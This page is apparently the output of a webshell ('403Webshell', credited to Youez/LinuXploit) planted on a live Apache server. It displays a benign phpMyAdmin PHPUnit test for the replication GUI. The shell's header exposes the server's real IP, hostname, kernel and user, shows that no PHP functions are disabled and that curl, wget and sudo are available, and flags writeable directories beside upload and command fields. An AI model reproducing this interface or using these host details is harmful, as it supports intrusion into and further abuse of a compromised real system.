403Webshell
Server IP : 3.96.16.70  /  Your IP : 216.73.216.15
Web Server : Apache
System : Linux ip-172-31-26-103.ca-central-1.compute.internal 6.1.163-186.299.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Feb 24 16:35:42 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/prod1.wondermakr.com/phpmyadmin/test/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/prod1.wondermakr.com/phpmyadmin/test/classes/ReplicationGuiTest.php
<?php

declare(strict_types=1);

namespace PhpMyAdmin\Tests;

use PhpMyAdmin\Replication;
use PhpMyAdmin\ReplicationGui;
use PhpMyAdmin\ReplicationInfo;
use PhpMyAdmin\Template;

/**
 * @covers \PhpMyAdmin\ReplicationGui
 */
class ReplicationGuiTest extends AbstractTestCase
{
    /**
     * ReplicationGui instance
     *
     * @var ReplicationGui
     */
    private $replicationGui;

    /**
     * Prepares environment for the test.
     */
    protected function setUp(): void
    {
        parent::setUp();
        //$_POST
        $_POST['primary_add_user'] = 'primary_add_user';

        //$GLOBALS
        $GLOBALS['cfg']['MaxRows'] = 10;
        $GLOBALS['cfg']['ServerDefault'] = 'server';
        $GLOBALS['cfg']['RememberSorting'] = true;
        $GLOBALS['cfg']['SQP'] = [];
        $GLOBALS['cfg']['MaxCharactersInDisplayedSQL'] = 1000;
        $GLOBALS['cfg']['ShowSQL'] = true;
        $GLOBALS['cfg']['TableNavigationLinksMode'] = 'icons';
        $GLOBALS['cfg']['LimitChars'] = 100;
        $GLOBALS['cfg']['DBG']['sql'] = false;
        $GLOBALS['cfg']['ShowHint'] = true;

        $GLOBALS['table'] = 'table';
        $GLOBALS['server'] = 0;
        $GLOBALS['urlParams'] = [];

        $this->replicationGui = new ReplicationGui(new Replication(), new Template());
    }

    /**
     * @group medium
     */
    public function testGetHtmlForPrimaryReplication(): void
    {
        $html = $this->replicationGui->getHtmlForPrimaryReplication();

        //validate 1: Primary replication
        self::assertStringContainsString('<div class="card-header">Primary replication</div>', $html);
        self::assertStringContainsString('This server is configured as primary in a replication process.', $html);

        //validate 2: getHtmlForReplicationStatusTable
        self::assertStringContainsString('<div id="replication_primary_section"', $html);

        self::assertStringContainsString('Binlog_Do_DB', $html);
        self::assertStringContainsString('Binlog_Ignore_DB', $html);

        self::assertStringContainsString('primary-bin.000030', $html);

        //validate 3: getHtmlForReplicationReplicasTable
        self::assertStringContainsString('replication_replicas_section', $html);
        self::assertStringContainsString('<th>Server ID</th>', $html);
        self::assertStringContainsString('<th>Host</th>', $html);
        //replica host
        self::assertStringContainsString('<td class="text-end font-monospace">Server_id1</td>', $html);
        self::assertStringContainsString('<td class="text-end font-monospace">Server_id2</td>', $html);
        self::assertStringContainsString('<td class="text-end font-monospace">Host1</td>', $html);
        self::assertStringContainsString('<td class="text-end font-monospace">Host2</td>', $html);
        //Notice
        self::assertStringContainsString('Only replicas started with the', $html);

        //validate 4: navigation URL
        self::assertStringContainsString('<a href="index.php?route=/server/replication', $html);
        self::assertStringContainsString('Add replica replication user', $html);

        //validate 5: 'Add replication replica user' form
        self::assertStringContainsString('<div id="primary_addreplicauser_gui">', $html);
    }

    public function testGetHtmlForReplicaConfiguration(): void
    {
        $replicationInfo = new ReplicationInfo($GLOBALS['dbi']);
        $replicationInfo->load();

        //Call the test function
        $html = $this->replicationGui->getHtmlForReplicaConfiguration(
            true,
            $replicationInfo->getReplicaStatus()
        );

        //legend
        self::assertStringContainsString('<div class="card-header">Replica replication</div>', $html);
        self::assertStringContainsString('<div id="replica_configuration_gui">', $html);
        //notice
        self::assertStringContainsString('Server is configured as replica in a replication process.', $html);
        //replica session
        self::assertStringContainsString('<div id="replication_replica_section"', $html);
        //variable
        self::assertStringContainsString('Master_SSL_CA_Path', $html);
        self::assertStringContainsString('Master_SSL_Cert', $html);
        self::assertStringContainsString('Master_SSL_Cipher', $html);
        self::assertStringContainsString('Seconds_Behind_Master', $html);
    }

    public function testGetHtmlForReplicationChangePrimary(): void
    {
        //Call the test function
        $html = $this->replicationGui->getHtmlForReplicationChangePrimary('replica_changeprimary');

        self::assertStringContainsString('<form method="post" action="index.php?route=/server/replication', $html);
        self::assertStringContainsString('Replica configuration', $html);
        self::assertStringContainsString('Change or reconfigure primary server', $html);
        $notice = 'Make sure you have a unique server-id in your configuration file (my.cnf)';
        self::assertStringContainsString($notice, $html);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit